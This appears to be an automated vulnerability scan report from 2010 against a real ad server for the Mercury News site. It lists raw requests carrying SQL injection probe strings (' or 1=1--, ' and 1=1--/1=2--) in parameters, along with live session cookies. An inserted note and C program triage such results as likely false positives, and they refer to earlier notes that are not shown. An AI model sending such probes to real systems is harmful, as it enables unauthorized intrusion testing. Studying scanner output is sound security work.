GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d1--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type
%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:23:26 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=cah6oal6ftjvu&t=1291767806;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19343
Request 2
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news13898589'%20or%201%3d2--%20&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type
%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:23:26 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=ftgh8cp6ftjvu&t=1291767806;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19333
(function(){
var multiAdPack = { "encoding":"UTF-8", "version":"1.1", "reqtype":"ac", "ads":[ {"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163h8r1o2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=602f48c4-0261-11e0-b779-0b7c1fdfcc42/B=V.4cA0S0q90-/J=1291767807058589/K=qJHQXaL3_Vc3bVYsBCcV6A/EXP=1291775007/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=602f48c4-0261-11e0-b779-0b7c1fdfcc42&T=19ek3gtk7%2fX%3d1291767807%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2303027397%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI2MDJmNDhjNC0wMjYxLTExZTAtYjc3OS0wYjdjMWZkZmNjNDIiIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2NzgwNjk5MDExNCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d8CA8B444&U=13uqpesp1%2fN%3dV.4cA0S0q90-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|602f48c4-0261-11e0-b779-0b7c1fdfcc42--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac1.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->", "type":"text/html", "id":"0", "size":["130x70"], "slug":false, "secure":false}, {"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aHZ2ZWZocShnaWQkNjAyZjQ4YzQtMDI2MS0xMWUwLWI3NzktMGI3YzFmZGZjYzQyLHN0JDEyOTE3Njc4MDY5OTAxMTQsc2kkMjExMDUxLHYkMS4wLGFpZCRfR3lEQVVTMHFJdy0sY3QkMjUseWJ4JHdnVlpKdFBrUV8yRXN3Li5tZ0kwN0EsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid 
value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h ...[SNIP]...
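The notes above about difference-based tests (the 404/200 pairs on feeds.mercurynews.com that came back with different Server headers, and the 19343/19333-byte ad responses here) call for the same triage step before a result is believed: check that both responses came from the same back-end, and check that an unmodified request does not vary by the same measure. The C program below is an added example, not part of the scan report or of any tool it mentions. It works on constructed responses modelled on the evidence on this page (bodies shortened, and two Apache responses invented for the stable-baseline case) and returns a verdict for each true/false pair. The header parsing is deliberately minimal and assumes CRLF line endings.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

typedef enum {
    VERDICT_NO_DIFFERENCE,  /* true and false responses match: nothing to chase */
    VERDICT_MIXED_BACKEND,  /* different Server headers: rerun on one host first */
    VERDICT_NOISE,          /* the unmodified baseline varies by the same measure */
    VERDICT_SIGNAL_STATUS,  /* status differs and the baseline is stable */
    VERDICT_SIGNAL_BODY     /* body length differs and the baseline is stable */
} verdict_t;

/* Constructed responses modelled on the evidence on this page (bodies
 * shortened); the two Apache responses are invented for the stable case. */
const char *const RESP_IIS6_404 =
    "HTTP/1.1 404 Not Found\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\n"
    "Content-Type: text/html\r\n\r\n<h1>The page cannot be found</h1>";
const char *const RESP_IIS5_200 =
    "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nX-ATG-Version: ATGPlatform/7.1p1\r\n"
    "Content-Type: text/html\r\n\r\n";
const char *const RESP_AD_A =
    "HTTP/1.1 200 OK\r\nSet-Cookie: S=s=cah6oal6ftjvu\r\n"
    "Content-Type: application/x-multiad-json\r\n\r\n{\"ads\":[{\"L\":\"602f48c4-0261\"}]}";
const char *const RESP_AD_B =
    "HTTP/1.1 200 OK\r\nSet-Cookie: S=s=ftgh8cp6ftjvu\r\n"
    "Content-Type: application/x-multiad-json\r\n\r\n{\"ads\":[{\"L\":\"59588b4a\"}]}";
const char *const RESP_APP_OK =
    "HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/xml\r\n\r\n<rss/>";
const char *const RESP_APP_ERR =
    "HTTP/1.1 500 Internal Server Error\r\nServer: Apache\r\n"
    "Content-Type: text/html\r\n\r\n<h1>Error</h1>";

/* Case-insensitive prefix match; stops safely at a NUL in s. */
static int prefix_ieq(const char *s, const char *name, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)s[i]) != tolower((unsigned char)name[i]))
            return 0;
    return 1;
}

/* Copy the value of header `name` into out. Returns 1 if present. */
static int header_value(const char *resp, const char *name, char *out, size_t outsz) {
    size_t nlen = strlen(name);
    const char *p = strstr(resp, "\r\n");          /* skip the status line */
    while (p != NULL) {
        p += 2;
        if (*p == '\r' || *p == '\0')
            break;                                 /* end of header block */
        if (prefix_ieq(p, name, nlen) && p[nlen] == ':') {
            const char *v = p + nlen + 1;
            while (*v == ' ')
                v++;
            const char *e = strstr(v, "\r\n");
            size_t len = e ? (size_t)(e - v) : strlen(v);
            if (len >= outsz)
                len = outsz - 1;
            memcpy(out, v, len);
            out[len] = '\0';
            return 1;
        }
        p = strstr(p, "\r\n");
    }
    return 0;
}

int status_code(const char *resp) {
    int code = 0;
    const char *sp = strchr(resp, ' ');
    if (sp != NULL)
        sscanf(sp + 1, "%d", &code);
    return code;
}

size_t body_len(const char *resp) {
    const char *b = strstr(resp, "\r\n\r\n");
    return b ? strlen(b + 4) : 0;
}

/* Same back-end only if both responses carry a Server header and the
 * values agree; a missing header is unknown, not a mismatch. */
int same_backend(const char *r1, const char *r2) {
    char s1[128], s2[128];
    if (!header_value(r1, "Server", s1, sizeof s1) ||
        !header_value(r2, "Server", s2, sizeof s2))
        return 1;
    return strcmp(s1, s2) == 0;
}

/* base_a and base_b answer the unmodified request twice; resp_true and
 * resp_false answer the 1=1 and 1=2 variants. */
verdict_t triage(const char *base_a, const char *base_b,
                 const char *resp_true, const char *resp_false) {
    if (!same_backend(resp_true, resp_false))
        return VERDICT_MIXED_BACKEND;
    if (status_code(resp_true) != status_code(resp_false))
        return status_code(base_a) != status_code(base_b) ? VERDICT_NOISE : VERDICT_SIGNAL_STATUS;
    if (body_len(resp_true) != body_len(resp_false))
        return body_len(base_a) != body_len(base_b) ? VERDICT_NOISE : VERDICT_SIGNAL_BODY;
    return VERDICT_NO_DIFFERENCE;
}

int main(void) {
    static const char *const names[] = { "no difference", "mixed back-end", "noise",
                                         "signal: status", "signal: body" };
    printf("feeds: IIS/6.0 404 vs IIS/5.0 200 -> %s\n",
           names[triage(RESP_IIS6_404, RESP_IIS6_404, RESP_IIS6_404, RESP_IIS5_200)]);
    printf("ads:   1=1 vs 1=2 ad JSON         -> %s\n",
           names[triage(RESP_AD_A, RESP_AD_B, RESP_AD_A, RESP_AD_B)]);
    printf("stable baseline, 200 vs 500       -> %s\n",
           names[triage(RESP_APP_OK, RESP_APP_OK, RESP_APP_OK, RESP_APP_ERR)]);
    return 0;
}
```

A mixed back-end or noise verdict means the pair is not yet evidence of anything; only a status or body difference that the baseline does not reproduce is worth the manual confirmation the report asks for, and even that is a lead to follow with a controlled test, not proof that the input reached a SQL query.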
1.118. http://open.ad.yieldmanager.net/a1 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://open.ad.yieldmanager.net
Path: /a1
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the payload forms the name of an additional query parameter (1'%20and%201%3d1--%20=1) rather than the value of one the endpoint already uses, and the response shown is an ordinary ad payload of the same type and similar size as the others on this page; only a difference that survives repetition against an unmodified baseline is worth following up.
Request 1
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E'
)%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d1--%20=1 HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 1
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:30:25 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=7du40c56ftkd1&t=1291768225;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19302
(function(){
var multiAdPack = { "encoding":"UTF-8", "version":"1.1", "reqtype":"ac", "ads":[ {"ad":"<a href=\"http://us.ard.yahoo.com/SIG=163ph2bt2/M=601052417.601382328.486678551.475726551/D=nchome/S=2022775704:AP15/Y=PARTNER_US/L=59588b4a-0262-11e0-bc79-3f914c26f4f7/B=brIcA0S0q98-/J=1291768225085491/K=.5_ypFdOw_.JbbC.cBGrcQ/EXP=1291775425/A=2090268460610887709/R=0/X=2/SIG=10oj4p42h/*http://www.bay101.com/\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/6fe1f6a7-354c-48b3-b72a-d8d7905e6c69\" alt=\"\" width=130 height=70 border=0/></a><img style=\"display:none\" width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=59588b4a-0262-11e0-bc79-3f914c26f4f7&T=19e0vj2eg%2fX%3d1291768225%2fE%3d2022775704%2fR%3dnchome%2fK%3d5%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d3572157642%2fH%3dYWx0c3BpZD0iOTY3MjgzMDAzIiBzZXJ2ZUlkPSI1OTU4OGI0YS0wMjYyLTExZTAtYmM3OS0zZjkxNGMyNmY0ZjciIHNpdGVJZD0iMjExMDUxIiB0U3RtcD0iMTI5MTc2ODIyNTAxMzA2OCIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d49A9B444&U=13u1adgp2%2fN%3dbrIcA0S0q98-%2fC%3d601052417.601382328.486678551.475726551%2fD%3dAP15%2fB%3d2090268460610887709%2fV%3d2\"><!-- fac-gd2-noad --><!--rTg has invalid value--><!--rTg has invalid value--><!--MME|59588b4a-0262-11e0-bc79-3f914c26f4f7--><!--TRK:a:2090268460610887709,m:601052417.601382328.486678551.475726551--><!--fac4.ads.adx.sk1.yahoo.com--><!--QYZ ,;130x70;ipbtf_tlsb;-->", "type":"text/html", "id":"0", "size":["130x70"], "slug":false, "secure":false}, {"ad":"<a href=\"http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aGloNmIwZShnaWQkNTk1ODhiNGEtMDI2Mi0xMWUwLWJjNzktM2Y5MTRjMjZmNGY3LHN0JDEyOTE3NjgyMjUwMTMwNjgsc2kkMjExMDUxLHYkMS4wLGFpZCRLcm9WcGtTMHFVay0sY3QkMjUseWJ4JDlwa0c1a1NsRFpESUlHOElubHFhYncsciQwLHJkJDExczJwZGQycCkp/0/*http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689\" target=\"_blank\"><img src=\"http://ads.yldmgrimg.net/apex/mediastore/06679f28-fb70-4803-854a-f5371e19b5ef\" alt=\"\" width=130 height=70 border=0/></a><!--rTg has invalid 
value--><!--rTg has invalid value--><!--GD--><!--QYZ 386763551,968810551;130x70;ipbtf_mlsb;--><img style=\"display:none\" width=0 h ...[SNIP]...
Request 2
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762308280&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8&fmt9=Standard%20Graphical,Rich%20Media&sz9=300x250&dlv9=ipatf&conTy9=fn_news&rTg9=Home&cCat9=homefront&sltId9=9&byt=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E'
)%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter&1'%20and%201%3d2--%20=1 HTTP/1.1 Host: open.ad.yieldmanager.net Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XO=y=1&t=336&v=3&yoo=1&XTS=1291409476&XSIG=pecndMzRAfdBMSLsOkyk3Ddt.Ss-; BX=4qhoo656b19gs&b=4&s=fq&t=336
Response 2
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 00:30:25 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: S=s=d6sobqp6ftkd1&t=1291768225;path=/; expires= Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: application/x-multiad-json; charset=UTF-8 Content-Length: 19313
The sltId2 parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sltId2 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /a1?V=4&pubId=22651123575&site=www.mercurynews.com&cntTy=js&cTopId=20201001&cDst=_blank&cSctn=section&enc=utf-8&ctLng=en-US&tagTy=multi_secure&nAdP=10&rFrame=1&flv=10.1%20r103&cb=1291762330562&url=http%3A%2F%2Fwww.mercurynews.com%2F&fmt0=Standard%20Graphical,Rich%20Media&sz0=130x70&dlv0=ipbtf_tlsb&conTy0=fn_news&rTg0=Home&cCat0=homefront&sltId0=0&fmt1=Standard%20Graphical,Rich%20Media&sz1=130x70&dlv1=ipbtf_mlsb&conTy1=fn_news&rTg1=Home&cCat1=homefront&sltId1=1&fmt2=Standard%20Graphical,Rich%20Media&sz2=130x70&dlv2=ipbtf_blsb&conTy2=fn_news&rTg2=Home&cCat2=homefront&sltId2=2'%20and%201%3d1--%20&fmt3=Standard%20Graphical,Rich%20Media&sz3=728x90&dlv3=ipbtf&conTy3=fn_news&rTg3=Home&cCat3=homefront&sltId3=3&fmt4=Standard%20Graphical,Rich%20Media&sz4=234x60&dlv4=ipatf&conTy4=fn_news&rTg4=Home&cCat4=homefront&sltId4=4&fmt5=Standard%20Graphical,Rich%20Media&sz5=130x70&dlv5=ipbtf_trsb&conTy5=fn_news&rTg5=Home&cCat5=homefront&sltId5=5&fmt6=Standard%20Graphical,Rich%20Media&sz6=130x70&dlv6=ipbtf_mrsb&conTy6=fn_news&rTg6=Home&cCat6=homefront&sltId6=6&fmt7=Standard%20Graphical,Rich%20Media&sz7=130x70&dlv7=ipbtf_brsb&conTy7=fn_news&rTg7=Home&cCat7=homefront&sltId7=7&fmt8=Standard%20Graphical,Rich%20Media&sz8=972x30&dlv8=ipstf&conTy8=fn_news&rTg8=Home&cCat8=homefront&sltId8=8